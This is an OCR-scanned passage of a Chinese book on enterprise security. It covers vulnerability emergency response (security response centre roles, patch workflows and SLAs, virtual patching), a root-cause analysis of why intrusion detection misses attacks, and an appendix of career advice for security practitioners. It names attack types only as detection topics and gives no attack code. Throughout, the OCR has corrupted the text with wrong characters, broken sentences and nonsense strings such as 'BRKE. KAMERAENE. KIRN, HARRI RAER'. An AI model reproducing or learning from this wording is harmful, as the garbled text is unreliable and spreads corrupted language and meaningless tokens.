理 后 台 对 外 ， 管 理 后 台 弱 口令 ， 统 计 第 三 方 开源 Web 程 序 如 discuz! 的 
版 本 及 其 对 应 漏洞。 





D 清理 服务 端口 ， 盘 点 不 必要 的 服务 和 协议 ， 排 查 高 危 端口。 


解决 了 上 述 问题 ， 再 投入 或 者 同步 进行 纵深 防御 + 入 侵 感 知 体系 建 
设 ， 才 会 事半功倍 。 


17.3 ”建立 应 急 啊 应 能 力 





以 下 分 别 从 组 织 、 流 程 、 技 术 体 系 三 方面 解释 互联 网 企业 的 应 急 响 
应 能 力 (SRC) ， 参 见 图 17-2。 





应 急 响应 
组 织 
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图 17-2 ”应 急 响 应 能 


1. 组 织 


有 SRC，SRC 不 只 是 一 个 提交 漏洞 给 奖励 反馈 的 平台 ， 更 是 一 个 黑 
日 两 道 关系 维系 的 渠道 ， 有 了 关系 渠道 ， 束 能 在 第 一 时 间 有 偿 获 知 ( 威 
胁 情 报 是 一 个 概念 ， 实 际 上 束 是 有 价值 的 信息 ) ， 这 种 情报 不 一 定 是 机 
器 可 读 的 JOC， 很 可 能 就 是 一 句 话 “你 们 的 xx 系 统 已 经 被 黑 了 ， 你 们 回去 








查 一 下 "”， 现 在 SRC 的 模式 更 是 玩 出 了 人 民 战 争 的 味道 ， 要 发 动 一 切 资 
源 举报 威胁 信息 。 较 成 熟 的 SRC 团 队 还 做 一 件 事情 : 漏洞 根 因 和 影响 面 
分 析 ， 再 后 面 的 流程 SRC 团 队 基本 不 再 干预 。 





3 个 典型 职能 部 门 是 : 运 维 、 产 品 开 发 团队 、 安 全 部 门 中 的 防御 体 
系 建设 小 组 ， 下 面 是 这 三 个 部 门 的 工作 分 工 : 





1) 运 维 团队 负责 跟 系 统 、 数 据 库 、 中 间 件 、 网 络 基础 架构 相关 的 
补丁 和 配置 更 改 的 具体 实施 工作 ， 例 如 第 三 方 开 源 服 务 器 软件 Nginx、 
OpenSSL、MySQL 的 漏洞 。 








2) 产品 团队 负责 产品 相关 的 代码 级 别 的 漏洞 修复 (如 果 是 自己 开 
发 的 产品 的 漏洞 〉。 


3) 安全 防御 体系 建设 小 组 负责 在 相关 的 入 侵 感知 体系 中 update 对 应 
该 漏洞 的 检测 规则 。 


2. 流 程 





1) 一 般 性 的 漏洞 跟 普 通 的 pug 修 复 流 程 一 样 ， 由 安全 部 门 接口 转交 
业务 线 接口 ， 之 后 由 业务 部 门 修 复 后 提交 新 版 本 进行 发 布 ， 遵 循 的 就 是 
普通 DevOps 发 布 流程 ， 并 无 特殊 之 处 。 至 于 漏洞 本 身 的 “修复 -验证 -发 
布 -监控 ”等 PDCA 的 流程 涵盖 在 DevOps 之 中 ， 跟 普通 的 版 本 发 布 是 一 样 
的 。 


2) 对 于 比较 严重 的 漏洞 ， 通 常 由 安全 、 运 维 、 产 品 3 个 职能 的 
Leader 组 织 一 个 会 议 ， 制 定 专 门 的 漏洞 修补 和 应 急 计 划 。 在 这 个 场景 
下 ， 关 键 角色 到 场 的 临时 会 议 效果 远大 于 制定 一 个 流程 ， 流 程 可 以 有 ， 
但 不 是 重点 。 形 象 一 氮 说 明 ， 上 午 开会 制定 计划 ， 中 午 实 施 发 布 ， 晚 上 


持续 监控 ， 一 天 就 完事 了 ， 其 过 程 主 要 是 还 是 参考 ITIL 等 做 一 些 风 














3) SLA 一 一 根据 漏洞 类 型 和 影响 程度 决定 ， 一 般 性 的 漏洞 也 不 必 
连夜 修复 。 高 危 漏 洞 ， 有 实际 攻击 面 的 会 连夜 赶 工 ， 高 危 漏 调 全 网 push 
补丁 可 要 求 在 24 小 时 内 完成 ， 总 体 上 认为 这 个 指标 跟 自 动 化 运 维 能 力 有 
天， 但 是 确认 影响 面 和 受害 范围 仍 属 于 安全 的 职 贡 。 


4) 假如 短 时 间 内 无 法 修复 ， 使 用 临时 规避 措施 ， 前 端 设 备 提供 “ 虚 
拟 补 J” 即 一 条 针对 该 漏洞 的 阻 断 规 则 (前 提 是 有 这 种 能 力 〉》， 或 者 短 
期 内 关闭 东 些 功能 ， 添 加 访问 控制 手段 作为 临时 规避 措施 。 


3. 技 术 


1) 发 现 得 快 依赖 于 入 侵 感 知 体系 ， 从 HIDS、RASP、WAF、SQL 
审计 等 各 个 维度 ， 这 是 互联 网 安全 防护 体系 的 核心 。 


2) 修得 快 则 依赖 于 持续 集成 和 上 自动 化 发 布 工 具 的 支持 ， 开 发 人 员 
如 何 一 键 发 布 ， 属 于 互联 网 公司 每 天 的 日 常 活动 ， 这 个 能 力 依赖 于 开发 





工具 、 运 维 工 具 建设 ， 职 责 上 跟 安 全 没有 直接 关系 却 对 漏洞 的 修复 效率 
产生 潜在 的 影响 。 





3) 同样 ， 目 动 化 运 维 能 力主 要 属于 运 维 的 职责 ， 但 也 会 影响 漏洞 


总 结 一 下 ， 实 际 上 有 3 件 事 : 1) 发 现 的 快 ，2) 修 的 快 ，3) 修 不 
了 ， 临 时 规避 。 


17.4 ERE 


很 多 人 以 为 条 一 个 汤 洞 没 检 测 出 来 或 者 条 一 个 检测 手段 不 够 深入 解 
决 起 来 都 很 简单 ， 确 实 站 在 单 点 技术 的 角度 ， 如 宁 仅 从 攻 与 防 来 看 可 能 
不 是 很 难 ， 但 问题 在 于 场景 切换 到 大 规模 的 服务 器 网 络 ， 这 个 问题 的 解 


会 复杂 化 。 


首先 是 履 兰 率 的 问题 ， 入 侵 检测 手段 的 demo 往 往 只 占 30% 的 工作 
量 ， 通 过 生产 环境 的 性 能 和 可 用 性 要 求 ， 并 且 灰 度 推广 到 全 网 达成 90%6 
以 上 的 者 关 率 ， 大 约 占 30% 的 工作 量 ， 而 防御 模型 本 映 的 优化 ， 数 据 质 
量 的 优化 ， 检 测 规 则 的 优化 占 40% 以 上 的 工作 量 。 小 规模 的 IDC 环 境 
里 ， 安 全 产品 的 全 网 推广 可 能 是 一 瞬间 的 事情 ， 但 是 大 型 IDC 环 境 里 可 
能 有 点 像 攒 VIP 积 分 一 样 是 个 缓慢 的 过 程 ， 所 以 相当 于 比 小 规模 IDC 环 
境 多 出 一 道 安全 建设 的 “额外 环节 ”。 而 防御 模型 的 优化 这 个 过 程 ， 在 一 
个 单 点 的 技术 环境 下 也 许可 以 浓 纵 为 一 条 规则 的 优化 ， 但 是 在 大 规模 
IDC 下 却 衍 生出 很 多 问题 ， 变 成 了 一 套 PDCA 的 方法 论 。 从 这 两 个 角度 
看 ， 规 模 大 了 以 后 问题 都 会 复杂 化 ， 相 对 应 的 方法 也 会 不 同 。 下 面具 体 
分 析 防 御 模 型 优化 这 件 事 。 

















图 17-3 是 可 以 作为 漏 报 的 根 因 分 析 流 程 ， 防 御 体 系 建设 的 一 大 过 程 
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现 ， 攻 击 者 获得 了 权限 但 所 有 的 安全 机 制 都 没 产 生 告 警 ， 那 就 要 追 调 这 
个 过 程 ， 演 斌 还原 整个 攻击 路 径 ， 并 分 析 没 有 抓 到 的 原因 ， 通 党 有 以 下 
几 个 环节 。 





漏 报 ? 


单 点 检测 深度 不 尾 ? 
选取 的 检测 维度 不 够 ? 
MERE? 
安全 产品 的 可 用 性 ? 
数据 质量 ? 

人 的 问题 ? 

图 17-3 ” 漏 报 的 根 因 分 析 流 程 


首先 ， 单 点 的 检测 手段 不 足 是 绝 大 多 数 人 都 会 想到 的 ， 可 能 是 检测 
规则 写 得 不 够 好 ， 对 某 些 情况 没有 考虑 到 ， 补 充 相 关 场 景 的 检测 规则 即 
可 。 例 如 只 做 了 rootkit 检 测 ， 而 没有 考虑 诸如 “不 利用 任何 第 三 方 可 执行 
文件 实现 的 反弹 shell” 就 属于 这 一 类 情况 。 














第 二 ， 单 点 的 检测 深度 如 条 没有 问题 ， 那 么 可 能 的 原因 是 单 维 度 的 


数据 不 足以 捕捉 事件 ， 或 者 单 维度 数据 不 足以 精确 剔除 误 报 ， 这 个 时 候 
就 要 引入 其 他 维度 的 数据 作对 比 ， 典 型 的 例子 比如 SQL 注入 ， 在 CGI 层 
面 要 对 抗 HITP 编 码 问 题 ， 单 维度 的 WAF 数 据 还 不 够 ， 可 能 需要 从 SQL 
层 引 入 第 二 层 检测 ， 两 个 维度 登 加 后 出 结果 。 更 常见 的 webshel 则 有 很 
多 维度 。 








第 三 ， 在 大 型 互联 网 中 ， 单 点 的 深度 和 检测 维度 都 没有 问题 ， 而 是 
出 问题 的 机 器 上 还 没 安装 和 运行 相关 的 检测 产品 ， 全 网 的 部 闭 覆 盖 率 才 
509%， 剩 下 的 50% 在 这 几 个 维度 是 梨 奔 ， 所 以 被 人 捅 了 马蜂 祖 。 这 个 问 
BRKE. KAMERAENE. KIRN, HARRI RAER 
好 ， 因 为 影响 了 性 能 和 可 用 性 推广 不 了 ， 最 后 都 等 于 没有 。 上 所 以 把 安全 
的 功能 和 检测 能 力 放 在 第 一 位 的 方案 往往 不 是 最 优 解 。 











第 四 个 层次 ， 以 上 都 没 问 题 ， 但 是 安全 产品 本 吴 处 在 亚 健康 状态 : 
进程 挂 了 ， 模 块 挂 了 ， 数 据 同 步 漏 了 .….. 最 后 的 结果 就是 出 问题 时 正好 
漏 过 了 .……. 一 方面 可 能 是 因为 产品 本 身 的 健壮 性 比较 着 ， 另 一 方面 可 能 
是 设计 不 够 好 ， 体 积 胱 肿 ， 垃 圾 数据 大 堆 ， 真 正 的 数据 利用 到 很 低 。 














第 五 个 层次 ， 禾 盖 率 100%， 但 十 数据 质量 不 局 ， 导 致 的 误 报 很 
多 ， 有 价值 的 信息 也 被 淹没 了 了 人。 质量 不 高 有 两 层 含义 : 第 一 层 数据 源 跟 
检测 目标 的 相关 性 不 强 ， 传 统 的 SOC 里 采集 了 大 量 的 数据 ， 但 很 多 信息 
不 是 安全 强 相 关 ， 也 不 足以 判断 到 撒 发 生 了 什么 ， 这 种 数据 就 没什么 
用 。 比 如 防火 墙 的 日 志 里 一 大 堆 数 据 包 分 片 的 告警 ， 在 海量 的 环境 下 纯 











属 垃圾 信息 。 第 二 层 含义 是 模糊 告警 太 多 ， 很 多 中 低 风 险 疑 似 触发 安全 
策略 的 告警 ， 需 要 通过 手工 做 大 量 验证 ， 整 体 上 ROI 很 低 。 人 有 习惯 效 
应 ， 告 警 刷 屏 多 了 又 不 是 严重 告警 ， 人 会 自动 “选择 性 忽略 >， 这 样 还 不 
如 没有 。 








如 采 以 上 都 没 问 题 ， 那 最 后 只 有 两 种 可 能 ， 一 种 是 整体 安全 机 制 存 
在 缺陷 ， 一 种 是 人 为 的 解读 能 力 缺 失 ， 或 者 是 人 的 事件 处 理 流程 上 存在 
问题 。 整 体 机 制 的 问题 涉及 推倒 重 来 ， 是 一 个 很 大 工程 ， 这 个 必须 要 由 
安全 负责 人 去 决策 。 人 的 问题 ， 一 方面 需要 提升 对 攻防 的 认 知 ， 一 方面 
需要 改进 流程 和 过 程 方法 论 。 


以 上 全 部 闭环 后 通常 能 在 一 轮 又 一 轮 螺旋 式 的 运 代 中 不 断 地 改进 既 
有 安全 体系 的 能 力 ， 所 谓 十 年 攻防 积累 很 多 都 是 背后 看 不 见 的 功夫 ， 这 
将 占据 了 日 常 主要 的 工作 量 。 没 有 经 验 的 安全 负责 人 在 给 领导 男 安 全 监 
图 的 时 候 千 万 别 低估 了 这 一 部 分 工作 量 ， 搞 了 个 demo 就 去 吹牛 ， 往 往 
会 摔 得 很 惨 。 





附录 ”信息 安全 行业 从 业 指 南 2.0 








我 更 早 以 前 写 过 《信息 安全 从 业 参 考 》《 信 息 安 全 的 职业 生涯 》 
《CSO 的 生存 艺术 》 等 文章 ， 这 几 篇 都 归 入 1.0 系 列 ， 这 篇 文章 是 1.0 的 
后 继 和 扩展 。 








我 个 人 没有 能 力 去 预言 安全 产业 的 发 展 ， 但 职业 毕竟 是 个 跟 产业 相 
关 性 比较 大 的 话题 ， 所 以 也 适当 说 一 些 个 人 观点 吧 。 先 从 甲乙 方 说 起 ， 
乙方 分 为 2B 和 2C 两 类 ， 这 里 主要 说 2B 的 部 分 ， 因 为 2C 中 的 大 部 分 更 适 
合 归 入 互联 网 行业 。IDC 的 报告 称 2018 年 中 国企 业 安全 市 场 约 200 亿 
RMB， 相 对 于 互联 网 、 游 戏 等 其 他 领域 而 言 显 然 是 个 很 小 的 市 场 ， 所 
以 安全 公司 不 会 像 互联 网 领域 的 创业 公司 一 样 遍 地 开花 ， 会 受到 整个 市 
场 容 量 的 限制 ， 对 于 乙方 ， 如 果 不 是 360， 那 就 是 启明 、 绿 盟 、 天 融 信 
这 类 公司 了 《名 字 太 多 不 一 一 列举 ， 如 果 你 所 在 公司 营业 额 很 高 而 未 出 
现在 此 列 请 不 要 生气 ， 这 里 并 无 意 去 关注 具体 的 公司 ) 。 有 人 会 说 以 后 
乙方 可 能 还 会 有 BAT 的 安全 团队 ， 没 错 ， 但 从 做 的 事情 而 言 ， 即 便 阿 里 
云 安 全 成 了 乙方 安全 ， 但 实际 上 做 的 事情 对 于 从 业者 而 言 还 是 甲 方 做 的 
那些 事情 ， 因 此 在 这 里 就 不 把 他 们 归 入 乙方 了 《〈2015 年 -2016 年 间 ， 这 
些 甲 方 为 了 做 2B 的 业务 也 招募 了 一 些 在 传统 乙方 做 售 前 和 销售 的 人 
R) 。 对 于 乙方 做 的 事情 ， 从 广 商 角度 看 可 能 会 有 一 系列 的 产品 和 服务 
的 创新 ， 但 对 于 从 业者 而 言 其 实 跟 以 前 差 不 太 多 ， 至 少 在 可 见 的 时 期 内 
































还 看 到 不 到 质 的 变化 。 如 宁 你 一 定 要 在 乙方 寻求 点 不 同 的 体验 ， 那 就 去 
互联 网 安全 公司 的 非 传统 安全 业务 ， 或 者 去 传统 安全 公司 的 互联 网 业务 
线 。 再 看 甲 方 ， 应 该 是 比较 乐观 的 ， 这 是 一 个 跟 企业 安全 市 场 盘 子 无 关 
的 领域 ， 随 着 企业 开始 重视 安全 ， 甲 方 会 有 更 多 的 安全 职位 ， 并 且 安 全 
只 位 会 多 样 化 ， 这 里 应 该 是 一 个 比较 广阔 的 空间 。 甲 方 、 乙 方 之 外 是 学 
术 研 究 领域 ， 笔 者 对 那 片 土地 不 是 很 了 解 ， 这 里 仅 限 于 工业 界 吧 。 欢 迎 
学 术 界 和 高 校 院 增 之 内 的 同学 们 补充 。〈 至 于 黑 产 和 国家 队 ， 就 不 打算 
写 了 ， 上 毕竟 大 部 分 人 不 会 走 这 条 路 ， 我 只 知道 那 也 是 一 个 很 神奇 又 有 点 
奇 葛 的 世界 ， 如 果 你 有 潜质 ， 仅 这 一 句 话 就 能 把 你 引 回 那里 。) 

















如 果 你 疝 在 考 夸 要 不 要 进入 这 个 行业 ， 我 可 以 提供 几 点 参考 。 扼 我 
和 朋友 们 观察 ，10 多 年 以 来 在 同一 个 公司 同一 个 级 别 上 的 工程 师 ， 大 多 
数 安 全 比 运 维和 开发 的 工资 高 ， 但 CTO 大 多 来 自 运 维和 开发 ， 鲜 有 从 安 
全 晋升 来 的 。 原 因 不 难 理解 ， 安 全 在 不 少 场合 都 不 是 必需 品 。 好 或 者 不 
好 因 人 而 异 ， 事 实 上 号 边 还 是 有 很 多 安全 技能 很 高 的 人 表示 如 果 再 给 一 
次 选择 的 机 会 ， 可 能 不 会 选择 安全 ， 这 其 中 包括 你 们 耳 见 能 详 的 大 牛 
们 。 有 一 个 方法 可 以 自 测 一 下 ， 如 果 你 内 心 深 处 都 没有 侦 尔 想 入 侵 一 
下 ， 黑 一 下 ， 一 探 安全 究竟 的 时 候 ， 我 建议 你 还 是 考虑 其 他 行业 ， 你 在 
这 个 行业 能 发 力 的 可 能 性 不 大 。 








从 从 业者 的 构成 看 ， 我 认为 可 以 分 为 黑客 效 、 安 全 图 和 安全 圈 的 外 
围 。 黑 客 圈 无 论 你 喜欢 叫 他 和 白 帽 子 还 是 什么 ， 总 之 就 是 以 攻防 技能 为 主 





线 的 人 。 安 全 圈 跟 黑客 圈 交 集 很 大 ， 也 包括 那些 在 安全 行业 的 主要 力量 
但 却 不 是 白 帽 子 或 黑 帽 子 出 喘 的 人 ， 这 两 类 人 构成 了 安全 行业 的 核心 ， 

即 本 质 上 安全 行业 是 由 理解 网 络 攻防 的 人 为 核心 构成 的 。 外 围 是 什么 

呢 ， 随 着 安全 需求 的 多 样 化 ， 安 全 会 引入 大 量 跟 攻防 不 直接 相关 的 人 ， 

比如 做 业务 安全 数据 分 析 ， 运 维 Hadoop 集 群 或 做 BI 的 开发 ， 或 者 做 安全 
产品 开发 ， 这 些 人 本 质 上 不 是 跟 安全 行业 强 绑 定 的 ， 例 如 有 的 人 做 安全 
产品 的 UI 开 发 ， 换 做 去 其 他 行业 也 一 样 做 UI， 做 业务 安全 数据 分 析 的 去 
非 安 全 的 业务 部 门 一 样 做 数据 分 机 ， 不 是 严格 意义 上 安全 行业 的 人 。 只 
有 以 攻防 为 主线 ， 和 以 安全 咨询 体系 为 主线 的 人 才 是 跟 安 全 行业 绑 定 

的 ， 这 些 人 需要 考虑 终生 投产 比 和 基因 决定 理论 对 目 身 的 影响 ， 而 外 围 
从 理论 上 讲 路 行业 更 容易 些 。 在 当前 时 间 点 看 ， 安 全 圈 是 一 个 很 小 的 圈 
子 ， 不 是 远 小 于 ， 是 远 远 小 于 运 维 和 开发 圈 ， 江 湖 味 道 更 浓 ， 有 时 候 也 
颇具 文人 相 轻 的 味道 。 不 过 好 的 一 面 是 互联 网 公司 之 间 安 全 团队 的 交流 
越 来 越 平 ， 除 了 下 接收 对 公司 外 ， 大 部 分 人 都 级 看 更 加 开放 的 沟通 和 分 
享 文化 迈进 。 说 了 这 么 多 ， 如 果 你 想 进 入 安全 行业 ， 并 且 成 为 中 流 古 

柱 ， 那 么 知识 结构 和 背景 技能 应 该 和 攻防 拉 术 强 相 关 ， 这 条 线 不 保证 你 
容易 成 为 高 管 ， 但 从 统计 学 角度 能 保证 你 不 偏离 行业 的 核心 。 














下 面谈 一 下 安全 管理 的 趋势 ， 因 为 这 个 会 影响 从 业者 的 价值 观 和 学 
JTA. RAUNA U FILTERA: 





1) 企业 安全 管理 最 终 都 会 问 互 联网 公司 学 习 。 未 来 大 多 数 公司 都 





会 复制 自己 业务 到 互联 网 ， 也 就 是 大 多 数 企 业 都 会 拥有 互联 网 的 属性 。 
从 现在 看 ， 互 联网 公司 的 安全 管理 方法 论 是 领先 传统 公司 整整 一 个 时 代 
的 ， 完 全 不 在 一 个 量 级 上 。 你 还 在 做 传统 的 安全 吗 ? 夸张 一 点 说 你 就 快 
不 属于 这 个 行业 了 。 


2) 向 云 迁 移 。 云 是 一 种 趋势 ， 虽 然 我 不 认为 短期 内 马上 会 有 非常 
多 的 公司 将 自己 的 业务 迁移 到 公有 云 上 ， 或 者 从 头 打造 私有 云 。 但 是 云 
计算 折射 出 的 IT 管理 方式 、 技 术 架 构 却 会 越 来 越 成 为 安全 管理 的 风向 
标 ， 例 如 分 布 式 IDC 管 理 、 虚 拟 化 、SDN、 海 量 运 维 生 态 、 业 务 伸 缩 、 
大 数据 、 高 度 自 动 化 、 敏 捷 发 布 ..…. 等 很 多 带 着 时 代 标 签 的 东西 ， 安 全 
管理 体系 的 设计 和 产品 化 落地 需要 越 来 越 多 地 围绕 这 些 特性 标签 展开 工 
作 ， 如 果 你 没有 这 方面 的 经 验 ， 也 会 逐渐 落后 。 








3) 倾 回 于 以 技术 和 产品 (工具 上 自动化) 解决 问题 ， 而 不 再 是 以 前 
宣扬 的 七 分 管理 三 分 技术 。 看 近 些 年 的 全 技术 发 展 ， 本 质 上 由 Google、 
Facebook 为 代表 的 这 些 互 联网 公司 带动 ， 除 了 技术 架构 ， 像 运 维 管理 、 
研发 生命 周期 管理 、 安 全 管理 都 在 成 为 其 他 公司 的 教科 书 ， 安 全 的 最 高 
境界 是 让 你 喘 处 于 保护 之 中 而 不 感觉 那些 党 琐 措施 和 流程 的 存在 ， 以 技 
术 、 目 动 化 、 机 器 学 习 、 人 工 智能 为 于 向 解决 问题 的 价值 观 已 超越 流程 
制度 的 落后 方式 ， 这 也 是 过 去 那些 理论 标准 越 来 越 显 得 发 虚 的 原因 。 














从 这 些 趋 势 看 ， 如 果 你 是 体系 架构 型 、 技 术 复 合 型 人 才 (俗称 全 栈 
工程 师 )， 特 定 技术 方向 专攻 型 人 才 以 后 会 受 市 场 青 睐 ， 而 “务虚 型 * 人 


才 的 市 场 价值 可 能 不 太 乐观 。 随 着 2000 年 后 安 氏 把 基于 资产 威胁 脆弱 性 
风险 评估 方法 论 带 入 中 国 ， 精 通 各 类 安全 标准 的 顾问 号 价 一 上 度 比 会 安全 
技术 的 工程 师 高 ， 但 现在 这 些 东 西 包 括 IT 治 理 的 理论 已 经 远 不 如 以 前 风 
光 ， 你 说 你 会 TO27001， 随 便 找 个 聪明 点 的 刚 毕 业 的 本 科 生 ， 做 一 年 也 
就 会 了 。 但 如 果 你 说 “我 有 10 万 台 服 务 器 的 安全 管理 经 验 ”， 对 方 可 能 会 
表示 “小 伙 子 ， 来 我 们 这 上 班 吧 ! ”。 让 会 攻防 的 人 学 习 ISO27001、 
20000 之 类 的 东西 ， 这 就 是 可 替代 性 。 很 多 同学 看 到 这 些 也 许 会 觉得 了 育 
候 ， 甚 至 咨询 圈 的 老人 会 列举 一 大 堆 “ 价 值 "? 和 “空间 ”， 就 像 《 浪 潮 之 
襄 》 所 说 的 ， 这 些 都 是 时 代 的 趋势 ， 不 是 以 个 人 意志 为 转移 的 ， 哪 怕 是 
公司 想 拒 绝 它 都 如 同 蜂 臂 挡车 。 为 什么 在 互联 网 公司 技术 专家 的 报酬 可 
以 比 管理 人 员 高 ， 取 决 于 你 解决 问题 所 对 应 的 价值 层次 ， 实 际 上 也 是 时 
代 演 进 的 产物 ， 也 许 现 在 更 缺 能 解决 实际 问题 的 人 。 从 就 业 的 角度 讲 ， 
这 种 趋势 为 技术 从 业者 提供 了 更 广阔 的 前 景 和 空间 。 











对 于 乙方 ， 比 较 有 价值 的 地 方 是 研究 部 门 、 安 全 服务 、 攻 防 强 相关 
产品 研发 。 对 于 甲 方 ， 除 了 大 互联 网 (门户 、 搜 索 、 厂 告 、 电 两 、 网 
DE HER Lh APP...) 、 人 金融 、 电 信行 业 之 外 ， 其 他 《就 目 
前 来 讲 ) 可 能 不 是 甲 方 安全 从 业 的 好 的 选择 ， 毕 竟 形 式 上 重视 安全 和 本 
质 上 重视 安全 还 是 两 回 事 。 现 实生 活 中 的 人 员 分 布 也 可 以 佐证 这 一 点 ， 
国内 比较 懂 安 全 的 人 绝 大 部 分 都 在 互联 网 公司 ， 第 一 梯队 3BAT、 第 二 
梯队 BAT 之 外 的 知名 互联 网 公司 (有 些 兄弟 单 拉 出 来 绝 不比 BAT 的 差 ， 
这 里 主要 是 笼统 的 比较 ) ， 第 三 梯队 可 能 在 金融 和 电信 业 有 一 些 ， 再 剩 











下 来 可 能 没有 太 异 安全 的 人 人 了， 因为 慌 安 全 的 早 束 被 上 述 公 司 挖 光 
J (当然 ， 如 果 看 官 您 恰巧 是 条 个 大 牛 ， 又 恰好 很 例外 不 在 上 述 行 
业 中 请 勿 生气 ， 我 会 尽 可 能 在 该 文 的 下 一 修订 版 本 中 注 明 “xxx 是 个 例 
外 ， 目 前 在 yyy 就 职 ") 。 甲 方 安全 建设 的 多 样 性 也 使 得 分 工 越 来 越 细 : 
网 络 与 基础 染 构 安全 ， 业 务 与 应 用 安全 ， 风 控 .……， 例如 SRC 运 营 就 是 
个 相当 垂直 的 细 分 职能 ， 尽 管 在 互联 网 公司 做 安全 你 可 能 会 有 优越 
感 ， 但 如 果 长 时 间 做 很 细 的 一 块 儿 也 可 能 导致 没有 成 为 领域 专家 却 “ 偏 
科 ” 得 很 厉害 。T 字 形 人 才 通 常 比较 受 欢迎 ， 最 好 是 甲 方 乙方 都 采 过 ， 那 
样 所 有 的 套路 你 都 会 了 ， 无 死角 。 








价值 一 方面 跟 人 才 市 场 的 供求 关系 有 关 ， 一 方面 也 跟 学 习 成 本 高 
低 、 获 取 技 能 的 难 易 度 有 关 ， 例 如 你 会 一 种 Web 开 发 语言 ，JavaScript， 
HTTP 协 议 ， 常 用 的 SQL DML 语 句 就 能 开始 玩 Web 安 全 了 ， 但 如 果 你 想 
玩 溢 出 ， 相 比 之 下 还 是 需要 花 更 多 的 时 间 学 习 更 多 东西 才能 越过 这 个 门 
槛 ， 而 读 懂 ISO27001 则 容易 的 多 《〈 这 里 无 意 于 表达 Web 和 二 进 制 谁 更 牛 
又 ， 谁 更 值钱 这 样 的 无 聊 问题 ， 只 是 举 个 抽象 的 例子 )， 如 果 你 觉得 因 
为 钱 多 而 把 自己 的 目标 设 定 为 要 走 袁 哥 的 路 ， 而 忽视 了 自己 的 兴趣 ， 
fail 的 可 能 性 比较 大 。 另 外 ， 技 巧 永远 不 能 代替 技术 ， 过 分 迷恋 于 技巧 
对 长 足 的 发 展 没 有 好 处 。 

















第 一 代 安 全 从 业者 的 技能 基本 以 OS 和 网 络 安 全 为 主 ，1.5 到 第 二 代 
以 广义 的 Web Service 等 应 用 安全 为 主 ， 如 果 一 定 要 说 第 三 代 ， 移 动 安全 








可 能 还 算是 当下 比较 热门 ， 关 注 者 比较 多 ， 相 对 前 沿 。 而 从 VC 的 角度 
看 ， 移 动 互 联网 可 能 都 不 再 是 热点 ， 早 已 开始 布局 更 下 一 代 的 东西 了 ， 
也 许 是 类 似 于 人 工 智能 这 样 的 领域 。PC 端 和 Web 安 全 虽然 研究 者 众多 ， 
议题 众多 ， 方 法 论 很 多 ， 大 多 数 行业 内 的 从 业者 每 天 围绕 这 些 工作 ,但 
这 些 应 该 即将 归 入 红海 ， 不 再 属于 前 治 的 、 时 代 滔 测 之 上 的 东西 。 反 过 
来 说 一 个 赣 筹 但 不 再 新 兴 的 市 场 ， 其 对 安全 的 需求 还 是 有 一 个 很 高 的 保 
有 量 ， 所 以 有 很 多 事情 可 以 长 期 做 但 也 许 之 后 就 不 在 是 什么 有 新 鲜 感 的 
东西 了 。 第 一 代 的 人 起 步 的 时 候 ， 那 时 候 IT 基础 设置 和 应 用 复杂 度 都 远 
不 如 现在 ， 所 以 那 时 候 都 是 把 安全 建设 放 在 网 络 和 系统 层面 的 。 而 后 来 
随 痢 IT 在 社会 生活 中 实用 化 的 程度 越 来 越 高 ， 业 务 越 来 越 多 的 依赖 于 

IT，I 的 多 样 性 和 TI 的 复杂 上 度 成 倍 提 升 ， 使 得 安全 的 需求 也 越 来 越 广 。 单 
个 从 业者 的 技能 不 太 可 能 通 吃 全 部 ， 大 一 点 的 机 构 开 始 把 业务 安全 独立 
出 来 ， 分 工 越 来 越 细 ， 人 研究 的 内 容 则 越 来 越 专 ， 安 全 团队 中 开始 加 入 
开发 和 运 维 ， 甚 至 还 涉及 硬件 领域 ， 也 许 以 后 的 安全 团队 就 是 一 个 什么 
人 都 有 的 兵器 库 。 对 个 人 来 说 一 方面 你 到 底 需 要 多 前 沿 的 铺垫 才能 不 落 
后 ， 允 一 方面 则 要 考虑 将 目 身 定位 收缩 于 哪些 点 才 可 能 挖 到 最 深 。 视 野 
一 定 是 尽 可 能 的 宽泛 ， 是 一 个 “ 放 ” 字 ， 但 落 到 实践 一 定 是 个 “ 收 ” 字 ， 以 
如 今 的 技术 复杂 度 你 不 可 能 样 样 都 精通 ， 只 能 挑 几 个 。 

















对 于 从 业者 的 前 景 ， 其 实在 过 去 相当 长 的 时 间 里 ， 由 于 乙方 公司 的 
净利 洞 很 低 以 及 甲 方 安全 不 是 产生 收入 的 部 门 ， 从 业者 的 前 景 一 度 比 较 
普 淡 。 直 到 后 来 有 了 360 这 样 的 公司 ， 有 了 BATI 的 凯 起 ， 才 使 得 技术 从 





业者 的 待遇 得 到 了 极 大 的 改善 。 斯 诡 登 事件 曝光 之 后 ， 国 家 层面 开始 重 
视 信 息 安 全 ， 以 华为 这 样 的 企业 建立 安全 能 力 中 心 为 代表 ，2014 年 安全 
人 才 需 求 开始 井喷 ， 供 求 比 大 幅 失 衡 ， 国 内 资深 从 业者 的 工资 已 经 赶 超 
了 美国 的 工程 师 ， 在 当下 看 是 一 片 利 好 ， 但 有 时 候 也 说 不 清 这 到 底 是 价 
值 回 归还 是 有 点 泡沫 成 分 ， 但 短期 内 一 定 是 人 才 供不应求 ， 长 期 供 不 应 
求 也 很 难说 ， 因 为 现在 越 来 越 多 的 高 校 也 开始 培养 安全 方 回 的 人 ， 供 给 
量 会 变 大 ， 安 全 会 从 小 众 变 成 大 从 学科 。 妆 然 ， 无 论 什么 时 候 ， 这 个 行 
业 的 精英 一 定 是 跟 兴趣 和 天 赋 挂 钩 的 ， 有 时 候 确 实 需要 一 点 “ 乍 门 那 
道 ”的 天 赋 。 


























关于 创业 ， 如 果 你 原先 是 做 安全 产品 研发 ， 能 种 一 文 完整 的 团队 出 
来 ， 做 的 产品 属于 下 一 代 类 型 或 者 干脆 就 是 市 场 空 白 ， 不 妨 和 尝试 一 个 ， 
其 他 的 类 型 我 认为 创业 的 成 功率 应 该 比较 低 。 





最 后 ， 如 果 你 有 条 件 的 话 ， 多 接触 技术 大 牛 和 资深 从 业者 ， 适 当 关 
注 一 下 安全 以 外 的 新 技术 趋势 。 这 时 可 能 会 有 聪明 的 同学 提问 ， 说 的 这 
些 是 不 是 可 以 概括 为 最 优 解 应 该 是 去 互联 网 公司 做 安全 ? 其 实 不 然 ， 甲 
方 乙方 在 不 同 阶段 有 不 同 的 需求 ， 没 有 哪里 一 定 最 好 之 说 ， 哪 怕 是 BAT 
对 有 些 人 来 说 也 是 瓶颈 之 地 ， 所 以 还 是 看 具体 场景 。 








2016 年 补遗 








从 2014 年 到 2016 年 初 近 两 年 的 情况 看 ， 有 几 个 方面 是 值得 关注 的 : 


